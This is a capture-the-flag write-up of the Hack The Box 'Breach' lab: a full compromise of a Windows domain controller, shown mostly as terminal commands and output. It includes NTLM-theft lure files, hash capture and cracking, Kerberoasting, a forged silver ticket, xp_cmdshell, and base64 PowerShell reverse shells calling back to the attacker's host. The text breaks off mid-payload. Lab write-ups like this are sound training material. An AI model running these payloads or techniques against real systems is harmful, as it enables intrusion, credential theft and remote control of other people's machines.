Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nmap -sC -sV -Pn 10.129.249.166 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 00:43 UTC
Nmap scan report for 10.129.249.166
Host is up (0.34s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-08 13:45:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-11-08T13:46:33+00:00; -10h58m37s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2025-09-07T08:04:48
|_Not valid after: 2026-03-09T08:04:48
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-11-08T13:45:50+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-08T13:45:50
|_ start_date: N/A
|_clock-skew: mean: -10h58m39s, deviation: 2s, median: -10h58m41s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.83 seconds
The DNS name is BREACHDC.breach.vl, let's add it to our /etc/hosts
SMB - TCP 445
Firstly I would want to check the smb service here
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec smb breach.vl -u guest -p '' --shares
SMB 10.129.249.166 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.129.249.166 445 BREACHDC [+] breach.vl\guest:
SMB 10.129.249.166 445 BREACHDC [*] Enumerated shares
SMB 10.129.249.166 445 BREACHDC Share Permissions Remark
SMB 10.129.249.166 445 BREACHDC ----- ----------- ------
SMB 10.129.249.166 445 BREACHDC ADMIN$ Remote Admin
SMB 10.129.249.166 445 BREACHDC C$ Default share
SMB 10.129.249.166 445 BREACHDC IPC$ READ Remote IPC
SMB 10.129.249.166 445 BREACHDC NETLOGON Logon server share
SMB 10.129.249.166 445 BREACHDC share READ,WRITE
SMB 10.129.249.166 445 BREACHDC SYSVOL Logon server share
SMB 10.129.249.166 445 BREACHDC Users READ
shareseems like our target, I will enumerate this share
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ smbclient //10.129.249.166/share
Password for [WORKGROUP\wither]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 8 13:51:31 2025
.. DHS 0 Tue Sep 9 10:35:32 2025
finance D 0 Thu Feb 17 11:19:34 2022
software D 0 Thu Feb 17 11:19:12 2022
transfer D 0 Mon Sep 8 10:13:44 2025
7863807 blocks of size 4096. 1494377 blocks available
smb: \> cd finance
smb: \finance\> ls
. D 0 Thu Feb 17 11:19:34 2022
.. D 0 Sat Nov 8 13:51:31 2025
cd
7863807 blocks of size 4096. 1491702 blocks available
smb: \finance\> cd ..
smb: \> cd transfer
smb: \transfer\> ls
. D 0 Mon Sep 8 10:13:44 2025
.. D 0 Sat Nov 8 13:51:31 2025
claire.pope D 0 Thu Feb 17 11:21:35 2022
diana.pope D 0 Thu Feb 17 11:21:19 2022
julia.wong D 0 Thu Apr 17 00:38:12 2025
I can found 3 folders of users, these would be valid account names.
We also have write access to this share, so I suspect the intention here is to get us to attempt a phishing attack by uploading a malicious file to capture the NTLM hash.
We can use NTLM-Theft to generate files in various formats.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ python3 /opt/utilities/ntlm_theft/ntlm_theft.py -g all -s 10.10.17.50 -f docs
/opt/utilities/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: docs/docs.scf (BROWSE TO FOLDER)
Created: docs/docs-(url).url (BROWSE TO FOLDER)
Created: docs/docs-(icon).url (BROWSE TO FOLDER)
Created: docs/docs.lnk (BROWSE TO FOLDER)
Created: docs/docs.rtf (OPEN)
Created: docs/docs-(stylesheet).xml (OPEN)
Created: docs/docs-(fulldocx).xml (OPEN)
Created: docs/docs.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: docs/docs-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: docs/docs-(includepicture).docx (OPEN)
Created: docs/docs-(remotetemplate).docx (OPEN)
Created: docs/docs-(frameset).docx (OPEN)
Created: docs/docs-(externalcell).xlsx (OPEN)
Created: docs/docs.wax (OPEN)
Created: docs/docs.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: docs/docs.asx (OPEN)
Created: docs/docs.jnlp (OPEN)
Created: docs/docs.application (DOWNLOAD AND OPEN)
Created: docs/docs.pdf (OPEN AND ALLOW)
Created: docs/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: docs/docs.library-ms (BROWSE TO FOLDER)
Created: docs/Autorun.inf (BROWSE TO FOLDER)
Created: docs/desktop.ini (BROWSE TO FOLDER)
Created: docs/docs.theme (THEME TO INSTALL
Generation Complete.
Then upload these files to the SMB Share and Transfer folder.
┌──(wither㉿localhost)-[~/…/htb-labs/Medium/Breach/docs]
└─$ smbclient //10.129.249.166/share -U "guest"%"" -c 'prompt OFF; cd transfer; lcd ~/Templates/htb-labs/Medium/Breach/docs; mput *'
chdir to ~/Templates/htb-labs/Medium/Breach/docs failed (No such file or directory)
putting file docs.jnlp as \transfer\docs.jnlp (0.2 kB/s) (average 0.2 kB/s)
putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.1 kB/s) (average 0.1 kB/s)
putting file docs.application as \transfer\docs.application (1.3 kB/s) (average 0.6 kB/s)
putting file Autorun.inf as \transfer\Autorun.inf (0.1 kB/s) (average 0.4 kB/s)
putting file docs.pdf as \transfer\docs.pdf (0.7 kB/s) (average 0.5 kB/s)
putting file desktop.ini as \transfer\desktop.ini (0.0 kB/s) (average 0.4 kB/s)
putting file docs.rtf as \transfer\docs.rtf (0.1 kB/s) (average 0.4 kB/s)
putting file docs-(url).url as \transfer\docs-(url).url (0.0 kB/s) (average 0.3 kB/s)
putting file docs.m3u as \transfer\docs.m3u (0.0 kB/s) (average 0.3 kB/s)
putting file docs.theme as \transfer\docs.theme (1.2 kB/s) (average 0.4 kB/s)
putting file docs.library-ms as \transfer\docs.library-ms (0.9 kB/s) (average 0.5 kB/s)
putting file docs-(handler).htm as \transfer\docs-(handler).htm (0.1 kB/s) (average 0.4 kB/s)
putting file docs-(fulldocx).xml as \transfer\docs-(fulldocx).xml (19.7 kB/s) (average 4.4 kB/s)
putting file docs.scf as \transfer\docs.scf (0.0 kB/s) (average 3.9 kB/s)
putting file docs.lnk as \transfer\docs.lnk (1.0 kB/s) (average 3.6 kB/s)
putting file docs-(includepicture).docx as \transfer\docs-(includepicture).docx (4.7 kB/s) (average 3.7 kB/s)
putting file docs-(externalcell).xlsx as \transfer\docs-(externalcell).xlsx (2.4 kB/s) (average 3.6 kB/s)
putting file docs.htm as \transfer\docs.htm (0.0 kB/s) (average 3.3 kB/s)
putting file docs-(stylesheet).xml as \transfer\docs-(stylesheet).xml (0.1 kB/s) (average 3.0 kB/s)
putting file docs.wax as \transfer\docs.wax (0.0 kB/s) (average 2.8 kB/s)
putting file docs-(remotetemplate).docx as \transfer\docs-(remotetemplate).docx (9.0 kB/s) (average 3.3 kB/s)
putting file docs-(frameset).docx as \transfer\docs-(frameset).docx (3.7 kB/s) (average 3.3 kB/s)
Then start the responder and we can capture the NTLM hash of Julia.Wong
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.249.166
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:27b3138b7497841a:3CE02BBC8FF329F0DA8EF8168B8F5671:010100000000000080915EC41451DC0178CBFA729C7D59F80000000002000800510058003800320001001E00570049004E002D0052005000510055005300430035004A00450035004A0004003400570049004E002D0052005000510055005300430035004A00450035004A002E0051005800380032002E004C004F00430041004C000300140051005800380032002E004C004F00430041004C000500140051005800380032002E004C004F00430041004C000700080080915EC41451DC0106000400020000000800300030000000000000000100000000200000F5B8E2780CA371BAEA940DBC900DE98B25C6376B91D3EFF7EF8124B71A4C61C10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00350030000000000000000000
Now we can use hashcat to help us crack its credit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ hashcat julia.hash -m 5600 /usr/share/wordlists/rockyou.txt
JULIA.WONG::BREACH:27b3138b7497841a:3ce02bbc8ff329f0da8ef8168b8f5671:010100000000000080915ec41451dc0178cbfa729c7d59f80000000002000800510058003800320001001e00570049004e002d0052005000510055005300430035004a00450035004a0004003400570049004e002d0052005000510055005300430035004a00450035004a002e0051005800380032002e004c004f00430041004c000300140051005800380032002e004c004f00430041004c000500140051005800380032002e004c004f00430041004c000700080080915ec41451dc0106000400020000000800300030000000000000000100000000200000f5b8e2780ca371baea940dbc900de98b25c6376b91d3eff7ef8124b71a4c61c10a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310037002e00350030000000000000000000:Computer1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JULIA.WONG::BREACH:27b3138b7497841a:3ce02bbc8ff329f...000000
Time.Started.....: Sun Nov 9 01:06:31 2025 (0 secs)
Time.Estimated...: Sun Nov 9 01:06:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1296.8 kH/s (1.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 120832/14344385 (0.84%)
Rejected.........: 0/120832 (0.00%)
Restore.Point....: 118784/14344385 (0.83%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: bratz1234 -> 042602
Hardware.Mon.#01.: Util: 63%
Get the credit JULIA.WONG:Computer1
We can try to verify the credit with smb and winrm
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec smb breach.vl -u JULIA.WONG -p Computer1
SMB 10.129.249.166 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.129.249.166 445 BREACHDC [+] breach.vl\JULIA.WONG:Computer1
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec winrm breach.vl -u JULIA.WONG -p Computer1
WINRM 10.129.249.166 5985 BREACHDC [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl)
WINRM 10.129.249.166 5985 BREACHDC [-] breach.vl\JULIA.WONG:Computer1
Although we can't get the shell, but we can check the user.txtfrom smb
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
. D 0 Thu Apr 17 00:38:12 2025
.. D 0 Sat Nov 8 14:08:18 2025
user.txt A 32 Thu Apr 17 00:38:22 2025
7863807 blocks of size 4096. 1514326 blocks available
Bloodhound by julia.wong
Now let's use this credit to use bloodhound to collect the information of domain
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ bloodhound-python -d breach.vl -u 'julia.wong' -p 'Computer1' -dc 'BREACHDC.breach.vl' -c all -ns 10.129.249.166 --dns-tcp
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: breach.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: BREACHDC.breach.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: BREACHDC.breach.vl
INFO: Found 15 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: BREACHDC.breach.vl
INFO: Done in 01M 20S
By looking at Julia, I couldn't find anything else that worked.
Let's continue to look at the kerberoastableusers
![[Pasted image 20251108142809.png]]
Silver tickets grant access to specific services or machines, while gold tickets grant access to any service or machine. With the service account password for the svc_mssql account, I could forge a ticket containing that password, bypass the domain controller (DC), and submit the ticket directly to the service.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ GetUserSPNs.py 'breach.vl/julia.wong:Computer1' -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 10:43:08.106169 2025-11-08 13:44:43.544994
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$8eb23b2a1180f82dd3f63da413ec2cb8$d461a593151b456fcb5750dc4e421bc9e9c30007449f8171dab29d62f2cffce682c8a5150e4d9ef32b08f92a38cdfe48bc29a1eb0324cb17b9dc78bcc578a9770c9326c5c09061ea5067b8525c3714cf1bc94bff89fdccc8accafa5789a12cfecab74798541ff05eb59fa48a5cae1106487a46cd97591feb1bff660c40efb692d40ab46d5cd02147dd6655625d653311d403cb4fe5082820bb951dd75c9c34b7a5bc93705cd047bffdf666843338fc197a24cbae5e1868cb048166e5ca0bf2794cee496376554bcc8c8a084b8a2e3fbd4087d75e5904e0437496f677ba424706819182ed4b57b2c84d446336a1b04cf241751e10910522d663f02dabc287322f22d017eec2537ea9381c936fadce8aee377b457ad3582f363c8a0d1198d39373ead3d590df52201603291f5b6498a2a9e23376a8d0cf37822002dbe6a0754c5a7fcd279c738b7ac0510ca066280209e387b701f0fda731ec7f984800d6b84f2db25195b1dfe928c77c444f0ebb177ba1470ee241ea3a210cb7cc0441034d3bef8024fc3bfefbb12a9ead5ded9ab03e87c81327c33262bc7bd2ad7f1170034f0619b43ff5c2d5d0ee58269ddd1411c8bcd7acc95bffbd548478b6bf730745c9a339d1cfc2d9ecc7f9f0d3b0315b075be9f5ffb3d680287439d08318110a2898637e41d7d757d2b87ffcf138d22d0d44af0447e8de2506b878d6fd9b89240ce729b216cc0680d8d3000e7d3af0bab6b170c7c6083af0ba56a3db37736f80a2897245a6ef6c5d23241625ebb5fabc8c9f5a60030f6e8513d574aaf65e840c3f6d26d9fc38e012622b0fbeff45fa57cd785848f5c12c74e121bb0bb7314c3392732b51074f11d56cb4614e66d2bc28f18d5f72e7e4537ceee85ba014f08327f289dd4a51ad2d0cfcff52fedcf143e8378c0a281448f4873fb540c2a4c3e1157679a92a221a91baf89c3c9f0cc99a5705f9bbbcb863660ee70b70ceed2002635c87e55423f8bb95fd3a3899aa0ed38985f179b2520a02139142ff2ee0b28b9c091d839774276255ce569db25063b56abc8b4e3f286710208ce6a616f4631c6c77a3079fb0b8d05aa323744a42d751528cb93c0084ab47e2224ed44477979be0f0cd298a20ac9f78216ece5ccb4e54e4106c28027a8dd6f163d7bcc56fc2fdaf77ed62492284b64abdb7f507e657043b26757d2d25c8aad133ca49e5a18192a50ffdc7cfcaccb8573798fc37ec93fe21fb3772ba76e5328af145a407db1aabda01298ea0c1af6f49a4efe6d6b4afc59a82c393e9917ae14f3491dcf701f07997400a2a2f4906dad5073e5d7bdcb8832960b0d53b5ed29dbe1fe610cef946f46146adacebbc408770000c63e00f4f116e0adffa2394b817cdfe297c4b372297c5babce706df1cfff68153995c10ce8724c27ea50fa4a300ea5e728ab156dae9a1a10d1724ac7c9c974254f54bd11b9866e0f565bce1f5b0
Then we can use hashcat to help us crack the credit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ hashcat mssqlsvc.hash -m 13100 /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$8eb23b2a1180f82dd3f63da413ec2cb8$d461a593151b456fcb5750dc4e421bc9e9c30007449f8171dab29d62f2cffce682c8a5150e4d9ef32b08f92a38cdfe48bc29a1eb0324cb17b9dc78bcc578a9770c9326c5c09061ea5067b8525c3714cf1bc94bff89fdccc8accafa5789a12cfecab74798541ff05eb59fa48a5cae1106487a46cd97591feb1bff660c40efb692d40ab46d5cd02147dd6655625d653311d403cb4fe5082820bb951dd75c9c34b7a5bc93705cd047bffdf666843338fc197a24cbae5e1868cb048166e5ca0bf2794cee496376554bcc8c8a084b8a2e3fbd4087d75e5904e0437496f677ba424706819182ed4b57b2c84d446336a1b04cf241751e10910522d663f02dabc287322f22d017eec2537ea9381c936fadce8aee377b457ad3582f363c8a0d1198d39373ead3d590df52201603291f5b6498a2a9e23376a8d0cf37822002dbe6a0754c5a7fcd279c738b7ac0510ca066280209e387b701f0fda731ec7f984800d6b84f2db25195b1dfe928c77c444f0ebb177ba1470ee241ea3a210cb7cc0441034d3bef8024fc3bfefbb12a9ead5ded9ab03e87c81327c33262bc7bd2ad7f1170034f0619b43ff5c2d5d0ee58269ddd1411c8bcd7acc95bffbd548478b6bf730745c9a339d1cfc2d9ecc7f9f0d3b0315b075be9f5ffb3d680287439d08318110a2898637e41d7d757d2b87ffcf138d22d0d44af0447e8de2506b878d6fd9b89240ce729b216cc0680d8d3000e7d3af0bab6b170c7c6083af0ba56a3db37736f80a2897245a6ef6c5d23241625ebb5fabc8c9f5a60030f6e8513d574aaf65e840c3f6d26d9fc38e012622b0fbeff45fa57cd785848f5c12c74e121bb0bb7314c3392732b51074f11d56cb4614e66d2bc28f18d5f72e7e4537ceee85ba014f08327f289dd4a51ad2d0cfcff52fedcf143e8378c0a281448f4873fb540c2a4c3e1157679a92a221a91baf89c3c9f0cc99a5705f9bbbcb863660ee70b70ceed2002635c87e55423f8bb95fd3a3899aa0ed38985f179b2520a02139142ff2ee0b28b9c091d839774276255ce569db25063b56abc8b4e3f286710208ce6a616f4631c6c77a3079fb0b8d05aa323744a42d751528cb93c0084ab47e2224ed44477979be0f0cd298a20ac9f78216ece5ccb4e54e4106c28027a8dd6f163d7bcc56fc2fdaf77ed62492284b64abdb7f507e657043b26757d2d25c8aad133ca49e5a18192a50ffdc7cfcaccb8573798fc37ec93fe21fb3772ba76e5328af145a407db1aabda01298ea0c1af6f49a4efe6d6b4afc59a82c393e9917ae14f3491dcf701f07997400a2a2f4906dad5073e5d7bdcb8832960b0d53b5ed29dbe1fe610cef946f46146adacebbc408770000c63e00f4f116e0adffa2394b817cdfe297c4b372297c5babce706df1cfff68153995c10ce8724c27ea50fa4a300ea5e728ab156dae9a1a10d1724ac7c9c974254f54bd11b9866e0f565bce1f5b0:Trustno1
Get another credit svc_mssql:Trustno1
Now we can forge the silver ticket with ticketer.py
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ ticketer.py -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn "MSSQLSvc/breachdc.breach.vl:1433" "administrator"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/home/wither/.local/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
Now we can visit the mssql service with administrator role
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ export KRB5CCNAME=administrator.ccache
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ mssqlclient.py -k -no-pass -windows-auth breachdc.breach.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>
To obtain a shell, we need to enable cmdshell as administrator to execute commands.
SQL (BREACH\Administrator dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE;
SQL (BREACH\Administrator dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE;
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'whoami';
output
----------------
breach\svc_mssql
NULL
Now grab the PowerShell #3 Base64payload from reverse.com
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3AC4ANQAwACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Then you can get the shell as svc_mssql
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.17.50] from (UNKNOWN) [10.129.249.166] 56999
whoami
breach\svc_mssql
PS C:\Windows\system32>
Privilege Escalation
I would enumerate the group and Privilege
PS C:\Windows\system32> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
It's worth noting the "Mandatory Label\High Mandatory Level," which indicates that UAC privileges have been elevated, and that "SeAssignPrimaryTokenPrivilege" and "SeImpersonatePrivilege" may involve privilege elevation.
Hence, let's use GodPotato to escalate our privileges and get a reverse shell as nt authority\system. (still use the PowerShell #3 Base64payload from reverse.com)
PS C:\programdata> .\GodPotato.exe -cmd 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3AC4ANQAwACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQAL